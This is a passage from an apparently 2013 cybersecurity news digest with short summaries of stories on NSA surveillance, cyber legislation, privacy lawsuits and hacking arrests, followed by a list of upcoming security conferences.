Shutting Down The US Government Likely Won't Slow The NSA's Surveillance Activities (TechCrunch) Shutting down the U.S. government wouldn't lead to the NSA halting its controversial and broad surveillance efforts. Documents leaked by Edward Snowden recently detailed the financial cost of the NSA and other intelligence efforts. The CIA is the most expensive chunk of the U.S. "black budget," costing $14.7 billion. The NSA costs $10.8 billion

Action on Cybersecurity Likely Delayed Until 2014 (Roll Call) Some lawmakers want to see president's initiative first. Congress almost certainly won't pass any kind of major cybersecurity legislation in 2013, according to industry officials, lobbyists and others who track the issue

Panel warns of global disparities in IT security (FierceGovIT) Disparate approaches to cybersecurity could make the global cyber environment less secure overall, warned panelists during a Sept. 19 event hosted by the Brookings Institution in Washington, D.C. "There's, I think, a very real concern that as the cybersecurity threat grows, and we develop palsy responses, there may arise what I call cyber security ghettos," said Allan Friedman, Brookings fellow and research director of Brookings' center for technology innovation

"Too big, too powerful and too influential"—why British lawmakers are obsessed with Google (Quartz) The British Parliament today released a report called "Supporting the creative economy." The title is snoozy but the proceedings are explosive. Google is mentioned 235 times over 70 pages of the report's first volume (pdf), which runs to 422 pages (including witness testimony). In contrast, Apple is mentioned 55 times, Facebook 53 times and Amazon a mere 21. Indeed at one point, the chair of the committee that put the report together refers to "our favourite subject of Google." Here are some highlights

California's Internet Eraser Law: Nice Idea, but It Won't Work (Slate) On Monday the governor of California signed a bill stipulating that social media sites such as Facebook, Twitter, and Tumblr allow kids under 18 to permanently erase their posts. Starting in 2015, these platforms must equip California's teenage users with the ability to delete video, text, and photo content forever--unless that content was originally uploaded by a third party or is subpoenaed. The law aims to protect a group of people prone to bad decisions from self-sabotage via drunken selfie, ignorant rant, overuse of #YOLO, and other Internet fouls we oldsters can only imagine (until we Google the names on the resumes). As state Sen. Darrell Steinberg told the Los Angeles Times, the new law offers "groundbreaking protection for our kids who often act impetuously with postings of ill-advised pictures or messages before they think through the consequences"

Task force seeks to update New York state cyber crime laws (SC Magazine) A proposal released Tuesday addresses much needed updates to New York State's white collar laws, which have remained mostly unaltered since 1965. The recommendations will aid in the enforcement of cyber crime, which is defined as any crime in which a computer, smart phone or the internet is used to commit or conceal a crime, according to the proposal released by the New York State White Collar Crime Task Force

Litigation, Investigation, and Law Enforcement

Inspector general: NSA spied on significant others (Politico) Some employees of the National Security Agency inappropriately used surveillance to snoop on significant others, the agency's inspector general says

Seymour Hersh on Obama, NSA and the 'pathetic' American media (Guardian) Seymour Hersh has got some extreme ideas on how to fix journalism — close down the news bureaus of NBC and ABC, sack 90% of editors in publishing and get back to the fundamental job of journalists which, he says, is to be an outsider

Edward Snowden's leaks are misguided — they risk exposing us to cyber–attacks (Guardian) Journalists are not best placed to identify security risks; we have to trust those who oversee the intelligence-gathering. Is Edward Snowden a hero or a criminal guilty of the most damaging espionage? It appears he is seen as both. Some will say he is a whistleblower who has fuelled the debate around the intercept of communications in cyberspace. But it will be no surprise to those who study the subject that a powerful search tool like Prism — and buffering software — is needed to find the communications of the terrorist or criminal among the billions of others

Ex–Spy Christopher Boyce on Snowden, WikiLeaks, and NSA Backdoors (Wired) A smart young dropout is welcomed into a promising career in the top secret world of U.S. defense contracting, but he's quickly shocked to discover the deception practiced by America's intelligence agencies at the highest levels. Disillusioned and outraged, he

Angry email users can take Google to court for keyword scanning, judge rules (The Verge) A group of email users can move forward with a class action lawsuit against Google for its Gmail keyword-scanning system, Judge Lucy Koh has declared. Earlier today, Koh filed a decision on Google's request to dismiss the case, which accuses it of violating anti-wiretapping laws by "reading" emails in order to display targeted advertisements. Though she agreed that aggrieved users couldn't legally bring a few of their claims to court, Google might still have run afoul of the California Invasion of Privacy Act and the federal Wiretap Act, and some of its far-reaching defenses stand little chance of success

Is hacking in self–defence legal? (Brisbane Times) In sport, sometimes the best defence is a good offence, but since hacking is considered illegal, organisations under a cyber attack only have defensive options. Or do they? A legal expert says retaliatory hacking might not be illegal in Australia. The general rule for penetration testers, or hackers who make a crust breaking into others' computers, is don't hack unless you've got consent

US government security background checks fumbled by investigators (Help Net Security) Edward Snowden's successful exfiltration of confidential NSA documents has proved that the background checks executed for government personnel in order to receive the needed security clearance are not foolproof. But how imperfect is this system? Reuters reporters have taken it upon themselves to dig through court documents and press releases related to 21 cases in which US federal prosecutors convicted special agents and private contractors for making false statements that led to a person receiving a security clearance when it perhaps should not have been granted

Payment Processors Are Government's Allies Against Fraud (American Banker) There is considerable confusion regarding the term "third party payment processors" and what they do

Why a Chinese Teenager Was Locked Up for His Tweets (Bloomberg) On Sept. 17, Yang Hui was summoned from his afternoon math class by his junior high school's vice-principal, according to an account the student provided to the state-owned Beijing News newspaper that was published on Tuesday. The 16-year-old quickly learned that he was in serious trouble. Three plainclothes and a uniformed police officer were waiting in the principal's office. They asked for his phone, interrogated him, conveyed him to the police station for further questioning and then locked him up in a local detention center. His apparent crime? He was re-tweeted

19–Year–Old Arrested for Hacking Miss Teen USA's Computer (Softpedia) The FBI has arrested Jared James Abrahams, a 19-year-old from Temecula, California, on suspicion of hacking into the computers of Miss Teen USA Cassidy Wolf and others. The man is said to have hacked the computers of several women to obtain compromising materials, which he later used to blackmail them

For a complete running list of events, please visit the Event Tracker on the CyberWire website.

Upcoming Events

Cyber Education Symposium (Arlington, Virginia, USA, November 19 - 20, 2013) Both the public and the private sectors suffer from a lack of highly trained and effective cyber security leaders. In response, the government, businesses, and academic institutions are all exploring ways...

Information Security Conference (Charleston, West Virginia, USA, October 2, 2013) On October 2, the WVOT Office of Information Security and Controls, will be sponsoring a no-charge information and cyber security awareness event at the Charleston Civic Center. The agenda will offer...

NSU Hosts FBI Presentation on National Cyber Security Awareness (Fort Lauderdale, Florida, USA, October 3, 2013) GSCIS Hosts the Federal Bureau of Investigation (FBI) Special Agents special presentation on "National Cyber Security Awareness." RSVP at the link.

The Monktoberfest (Portland, Maine, USA, October 4, 2013) Our speakers will explore how social trends can change the way we build and use technology, and how technology in turn can change the way we socialize.

Suits and Spooks NYC 2013 (New York, New York, October 5, 2013) Since the landscape is foggy, the threat actors numerous and hard to identify, and the attacks proliferating on a daily basis, the focus of the next Suits and Spooks conference will be to identify non-state...

Forensics and Incident Response Summit EU (Prague, Czech Republic, October 6 - 13, 2013) The Summit will focus on high quality and extremely relevant content as well as panel discussions in Digital Forensics and Incident Response. In addition, we encourage you to take every opportunity to...

CyberMaryland 2013 (Baltimore, Maryland, USA, October 8 - 9, 2013) Join cybersecurity leaders, luminaries and rising stars at CyberMaryland 2013. This two-day event at the epicenter of the nation's cybersecurity innovation and education, will create opportunities for...

2013 Maryland Cyber Challenge (Baltimore, Maryland, USA, October 8 - 9, 2013) Held in conjunction with Cyber Maryland and intended to let students and young professionals showcase their cybersecurity skills, Maryland Cyber Challenge offers competition in three divisions: high school,...

AFCEA Hill AFB Technology & Cyber Security Expo (Ogden, Utah, USA, October 9, 2013) The purpose of this first-time event is to allow base personnel the opportunity to learn about the latest computer security trends, network with peers, share remediation strategies and to view and demo...

NSU's Raising Savvy Cyber Kids with Ben Halpert (Fort Lauderdale, Florida, USA, October 10, 2013) Ben Halpert is an award-winning author of several books for diverse audiences. The Savvy Cyber Kids At Home: The Family Gets A Computer (October, 2010) is a picture book that teaches the concepts of online...

International Conference on Cyber–Enabled Distributed Computing and Knowledge Discovery (Shanghai, China, October 10 - 12, 2013) The International Conference on Cyber-enabled Distributed Computing and Knowledge Discovery promotes research and development of cyber-related technology. It is unique and significant in that it spans through...

VizSec 2013 (Atlanta, Georgia, USA, October 14, 2013) VizSec brings together researchers and practitioners in information visualization and security to address the specific needs of the cyber security community through new and insightful visualization techniques.

Hack-in-the-Box Security Conference 2013 (Kuala Lumpur, Malaysia, October 14 - 17, 2013) The 11th annual HITB Security Conference (16th/17th October) will be a triple track offering featuring keynotes by Andy Ellis, Chief Security Officer at Akamai and Joe Sullivan, Chief Security Officer...

USDA Cyber Security Symposium and Expo 2013 (Washington, DC, USA, October 15, 2013) The Cybersecurity Expo, running in conjunction with the Summit, will allow exhibitors the opportunity to provide live demos and share information with government personnel and industry partners. Summit...

SNW Fall 2013 (Long Beach, California, USA, October 15 - 17, 2013) SNW is the world's largest independently produced conference series focused on the evolution of architecture for a new world of mobility, Big Data and business agility. Produced by Computerworld -- and...

Hexis Exchange (Athens, Greece, October 16 - 17, 2013) Attendees will have the opportunity to participate in a knowledge exchange of the latest enterprise security topics through expert led business and technology forums, hands-on sessions, and training. Such...

Cybersecurity Symposium: "Protect. Defend. Educate." (Linthicum, Maryland, USA, October 16 - 17, 2013) The Cybersecurity Symposium being held October 16-17, 2013, will deliver first-class training for government and industry security professionals while simultaneously offering high-level keynote speakers,...

NSU Healthcare Cyber Security Summit (Fort Lauderdale, Florida, USA, October 17, 2013) In today's modern healthcare systems, data is everywhere, including sensitive patient data that needs to be secured and monitored. Join top healthcare security professionals from Nova Southeastern University,...

Nuclear Regulatory Commission Cyber Security Conference & Expo (Rockville, Maryland, USA, October 17, 2013) This one-day conference will consist of cyber sessions in the NRC Auditorium given by government and industry speakers. Exhibit tables will be set-up just outside the Auditorium and companies will have...

Securing the Internet of Things Summit (San Francisco, California, USA, October 21, 2013) The Internet of Things is still in its infancy and the security community has a chance to build in new approaches to security if we get started now. More secure embedded operating systems and applications,...

13th Industrial Control Systems Cyber Security Conference (Atlanta, Georgia, USA, October 21 - 22, 2013) Industrial Control Systems (ICS) operate the infrastructures of electric power, water, chemicals, manufacturing, transportation, defense, etc. and link the digital and physical worlds. Their cyber security...

Cloud Connect (Chicago, Illinois, USA, October 21 - 23, 2013) Cloud Connect returns to Chicago October 21-23, 2013 with an all new program built around the leading cloud platforms. Cloud Connect provides the independent guidance IT professionals need to successfully...

cybergmut Technical Tuesday: Cyber Security Strategy — Why We're Losing and What's Needed to Win (Columbia, Maryland, USA, October 22, 2013) CrowdStrike's Steve Chabinsky explains the situation. Everybody seems to be spending more on cybersecurity, but with questionable return on investment. In fact, the problem clearly is getting...

Cyber Security Seminar and IT Expo at Peterson AFB (Colorado Springs, Colorado, USA, October 22, 2013) The Cyber Security Seminar and IT Expo is a one-day event held on-site where industry vendors will have the opportunity to display their products to personnel attending briefings concerning the latest...

Joint Federal Cyber Summit 2013 (Washington, DC, USA, October 23 - 24, 2013) This collaborative government wide event is truly one of a kind, with speakers and attendees anticipated to represent more than 10 federal government agencies. Information sharing will be accomplished...

NSU's 12 Simple Cybersecurity Rules For Your Small Business (Fort Lauderdale, Florida, USA, October 24, 2013) In this presentation twelve simple and inexpensive techniques for protecting small businesses from cyber threats will be discussed. While complex and expensive solutions exist to improve the security...

2013 ACT–IAC Executive Leadership Conference (Williamsburg, Virginia, USA, October 27 - 29, 2013) Advances in technology and massive increases in data available can both challenge and transform Government mission performance. ELC-2013 focuses on how to make this transformation a reality, in and for...

SAP NS2: National Security Solutions Summit (Falls Church, Virginia, USA, October 29, 2013) Join us for a day of learning and networking focused on how to advance U.S. national security and homeland security through I.T. innovation. Top-notch speakers will address the new challenges facing U.S.

Regional Cyber Security Forum & IT Day (CSFI) — Hawaii (Honolulu, Hawai'i, USA, October 30, 2013) 2013 marks the 10th anniversary of National Cyber Security Awareness Month, and FBC will host the 1st Annual Cyber Security Forum & IT Day (CSFI) at Fort Shafter - Club Hale Ikena to coincide with the anniversary,...

NSA Hawaii — Cyber Security, Intelligence & IT Day (Honolulu, Hawai'i, USA, October 30, 2013) Be a part of the 1st Annual Cyber Security, Intelligence and IT Day set to take place at the new National Security Agency (NSA) Hawaii Rochefort facility. The event will be hosted by NS/CCS Hawaii Technology...
